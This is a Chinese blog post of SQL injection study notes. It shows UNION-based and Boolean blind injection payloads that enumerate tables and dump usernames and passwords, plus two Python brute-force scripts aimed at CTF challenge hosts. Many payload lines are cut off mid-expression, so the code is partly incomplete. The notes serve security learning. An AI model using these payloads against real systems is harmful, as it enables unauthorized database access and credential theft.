SQL注入-Day17

最新推荐文章于 2024-11-09 16:20:10 发布
最新推荐文章于 2024-11-09 16:20:10 发布
阅读量2.3k 收藏
点赞数
分类专栏: 学习笔记 文章标签: SQL注入 联合查询 布尔盲注 数据库安全 信息泄露
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kanna_bush_t/article/details/122948383
版权

四、union 联合注入(单引号闭合字符型为例)

4.5 查库

?id=-1' union select 1,(select group_concat(table_name) from information_sch

4.5.1 查某一个库中的表

注意:仅仅是查当前数据库 database() 的表,由于处于当前数据库下,是不能查看其它数据库中数据的。

 4.5.2 查列

?id=-1' union select 1,(select group_concat(column_name) from information_schema

4.5.3 查内容, ~ 连接 

?id=-1' union select 1,(select group_concat(concat_ws('~',username,password)

//同时查三列数据的话
?id=-1' union select 1,group_concat(id,'--',username,'--',password),3 from u

五、Boolean 盲注 

5.1 手动:结合 Burp 爆破进行

5.1.1 查数据库长度

?id=1' and length(database())=1--+ 
//爆破数字 1

5.1.2 判断库名组成 security 

?id=1' and left(database(),1)='a'--+
//爆破字母 a

?id=1' and ascii(substr(database(),1,1))='b'--+
//爆破 ascii 值 b

5.1.3 查表 users 

?id=1' and ascii(substr((select table_name from information_schema.tables wh

//同时爆破数字a,和 数字b,其中 b 是 ascii 值

5.1.4 查列 username password 

?id=1' and ascii(substr((select column_name from information_schema.tables w
//同时爆破数字a,和 数字b,其中 b 是 ascii 值

5.1.5 查内容 

?id=1' and ascii(substr((select username from security.users limit a,1),1,1)
//爆破 ascii 值 b

?id=1' and ascii(substr((select password from security.users limit 0,1),1,1)
//爆破 ascii 值 b

5.2 脚本

5.2.1 直接法(较慢,正确率高)

import requests
url = "http://ba63d0df-d99d-4cba-a692-5027868780b6.challenge.ctf.show:8080/a 
b="{zxcvbnmasdfghjklqwertyuiop-1234567890}_" // 字典库,包含小写字母数字-下划线}{ 
flag = '' 
for i in range (1,50): 
for h in b: 
//payload根据题目环境构造有效payload 
payload = "' or if((mid((select group_concat(f1ag) from ctfshow_flxg
//payload = "' or if((mid((select database()),{},1)='{}'),1,0) -- ".f
//payload = "' or if((mid((select group_concat(column_name) from info
//payload = "' or if((mid((select+group_concat(table_name) from infor
//print(payload)
data = {
"username":payload, //注入点
"password":1
}
s=requests.post(url,data=data) //发送post请求
//print(s.text)
if "\\u5bc6\\u7801\\u9519\\u8bef" in s.text: // 根据不同回显,找到有效的
flag+=h //对于正确情况保留字符串
print('flag is {}'.format(flag))
break
if flag[-1] == "}":// 找到完整的flag
print("flag :"+flag)
break

5.2.2 二分法

import requests 
url = "http://ecaca1c3-ce93-4f20-82b6-ea325d85e6c3.node4.buuoj.cn:81/search. 
i = 0 
flag = '' 
while True: 
i+=1 
header = 32 
tail = 128 
while header<tail:
mid = (header+tail)>>1
data = {
'id':f"1^(ord(substr((select(group_concat(password))from(F1naI1y
}
s=requests.get(url,params=data)
if 'Click' in s.text:
header = mid+1 // sql语句正确的时候
else:
tail = mid // sql语句错误执行
if header!=32:
flag+=chr(header)
print(flag)
else:
break

 

kanna_bush_t
关注
专栏目录
【PTE-day01 sql注入
samRsa
11-05 231
database() #数据库名称version() #数据库版本user() #数据库使用者group_concat() #将参数拼接到一行集中输出limit a,b #依次取值 从a+b的位置取b的值进行输出hex() #对参数进行16进制编码unhex() #对参数进行16进制解码into outfile() #向服务器写入指定的文件。
sql注入
zejiiii的博客
02-15 3083
SQL注入 一 注入分类 注入点分类 数字型注入 字符型注入 提交方式分类 提交方式分类 GET 方式注入 POST 方式注入 COOKIE 方式注入 HTTP 头部注入:XFF,UA,REFRERE 是否回显 联合查询 布尔盲注 报错注入 时间盲注 二次注入 堆叠查询(同时执行多条语句) 二 注入判断 工具扫描:网站漏扫工具,AWVS、AppScan、OWASP-ZAP、Nes
limit 后注入_web安全之SQL注入基础
weixin_39608394的博客
12-03 247
本文是web安全系列第一章,主要介绍SQL注入基础。SQL注入基础SQL注入介绍Web请求响应过程:什么是SQL注入?就是指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。为什么会产生sql注入?开发人员可以使用动态SQL语句创建通用,灵活的应用。动态SQL语句是在执行过程中构造的,...
SQL注入-Day14
kanna_bush_t的博客
02-11 2914
一、注入分类 1、依据注入点类型分类 数字类型的注入 字符串类型的注入(单引号、双引号、加括号等) 搜索型注入 2、依据提交方式分类 GET注入 POST注入 COOKIE注入 HTTP头注入(XFF注入、UA注入、REFERER注入) 3、依据获取信息的方式分类 基于布尔的盲注 基于时间的盲注 基于报错的注入 联合查询注入 堆查询注入 (可同时执行多条语句) 二、注入判断 1、工具扫描 常见的网站漏洞扫描工具:AWVS、AppScan、OWASP-ZAP、Nessus 等
SQL注入-Day20
kanna_bush_t的博客
02-19 609
十、异或注入 异或:一种逻辑运算,简言之,相同为假,不同为真,NULL 与任何条件异或结果都为 NULL, mysql 中的符号是 ^ 和 xor。 测试: 常用手段:用于判断所过滤的字符串 ?id=1'^(0) //得到正常的回显页面,由于异或之后得到 真 ?id=1'^(1) //得到错误的回显页面,由于异或之后得到 假 常常用于判断我们所注入的某些字段是否被过滤 ?id=1'^(length('union')>0) 如果 union 已被过滤,那么得到的将会是 .
SQL注入-报错注入
热门推荐
LJH1999ZN的博客
02-09 1万+
sql注入之报错注入的演示与介绍
PHP代码审计之SQL注入-Day3
ro4lsc的博客
03-11 7721
认识SQL注入漏洞 SQL注入攻击(SQL Injection),简称注入攻击,是web开发中最常见的一种安全漏洞。可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作,甚至有可能获取数据库乃至系统用户最高权限。 而造成SQL注入的原因是因为程序没有有效过滤用户的输入,使攻击者成功的向服务器提交恶意的SQL查询代码,程序在接收后错误的将攻击者的输入作为查询语...
day37-SQL注入的方式
liangjiao_shou的博客
06-01 681
​ 通过api接口调用来实现自动化扫描,不然每个注入点,都需要我们手工的使用sqlmap;​ 参考:https://www.freebuf.com/articles/web/265908.html。​ 结果进行排序,得到ascii的数字,在解码成字符即可/可以使用bp将SQL盲注和手动注入走遍。​ addslashes(参数):在参数字符串单引号或双引号前添加反斜线\。magic_quotes-gpc=on 开启注入防御,特殊字符进行转义。python脚本:可以进行批量注入检测。
0day 新接口泛微e-cology getHendledWorkflowRequestList SQL注入漏洞
资深程序员,曾自学JAVA,C#,如今从业于网安行业
07-19 880
漏洞挖掘是指通过分析软件、系统或网络中存在的安全漏洞来发现并利用这些漏洞。漏洞挖掘是信息安全领域的一项重要工作,可以帮助企业和组织提高系统的安全性,避免黑客攻击和数据泄露。漏洞挖掘的流程一般可以概括为以下几个步骤:确定目标:确定要挖掘的软件或系统。这可能是一个应用程序、操作系统、网络设备或其他系统。收集信息:收集有关目标的信息,包括架构、协议、版本和配置等。这些信息可以通过互联网搜索、手动扫描、自动化工具和其他途径获得。分析漏洞:通过手动和自动化技术进行漏洞分析,识别潜在的漏洞类型和攻击面。
[0day]通达 OA v11.7 后台 SQL 注入到 RCE1
08-03
通达 OA v11.7 后台 SQL 注入到 RCE 通达 OA v11.7 版本存在后台 SQL 注入漏洞,攻击者可以通过构造特殊的 SQL 语句,绕过安全机制,获取数据库权限,并最终获得远程代码执行(RCE)权限。 知识点一:SQL 注入漏洞...
【1day】复现宏景HCM codesettree SQL注入漏洞(CNVD-2023-08743)
记录并分享学习安全的知识点..
07-26 1351
北京宏景世纪软件股份有限公司 HCM codesettree 接口存在SQL注入漏洞,攻击者通过漏洞可以获取到登陆系统的账号密码和数据库信息。
SQL DUMB Series-3 & 4 通关过程分享(sql注入学习DAY2)
deja_vuDM的博客
06-10 1254
单引号加括号,双引号加括号
如何产看SQL 查询的执行时间
技术广场
11-05 440
对于查看毫秒级执行时间,推荐使用 SET STATISTICS TIME或 GETDATE()计时方法。这两种方法可以直接在 SQL Server Management Studio 中快速应用。
如何在Linux中使用Cron定时执行SQL任务
Mr_Wanter
11-08 449
linux crontab 定时执行sql脚本。
Flink SQL
qq_41081716的博客
11-05 414
以上步骤展示了如何使用 Flink SQL 从 Kafka 读取数据、进行聚合计算,并将结果分别写入 MySQL 和 HDFS。这是一个基本的流程,根据实际需求,可以调整表结构、连接器配置以及 SQL 查询以适应不同的应用场景。
2.索引:SQL 性能分析详解
最新发布
m0_72560900的博客
11-09 719
SQL性能分析是数据库优化中重要的一环。通过分析SQL的执行频率、慢查询日志、PROFILE工具以及EXPLAIN命令,能够帮助我们识别出数据库性能的瓶颈,并做出有效的优化措施。以下将详细讲解这几种常见的SQL性能分析工具和方法。
SQL50】day 1
m0_73629042的博客
11-05 365
使用不等于符号无法筛选null情况。
mysql约束和高级sql
2301_81490350的博客
11-06 1330
事务是一组SQL语句的集合,它们要么全部成功执行,要么全部不执行,把一系列的操作放在一个地方,然后再决定是否生效。MySQL存储过程是一组为了完成特定功能的SQL语句集合,它被编译并存储在数据库中,可被多次调用执行,使用存储过程可以提高性能,加强可维护性。:连接用于结合两个或多个表的行,基于相关的列。这个查询的结果将是一个包含两列的表 books.title 和 authors.name,每一行都对应一个书籍及其作者的名称。MySQL中的约束用于定义表中数据的规则,以确保数据的准确性和可靠性。
探索web技术深度--web-day4教程内容
4. Web安全:可能讲解Web安全的基础知识,如XSS攻击、CSRF攻击、SQL注入等,并介绍如何使用HTTPS、身份验证、授权和安全的编程实践来保护网站。 5. 数据库知识:可能涉及数据库设计原理、关系型与非关系型数据库的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值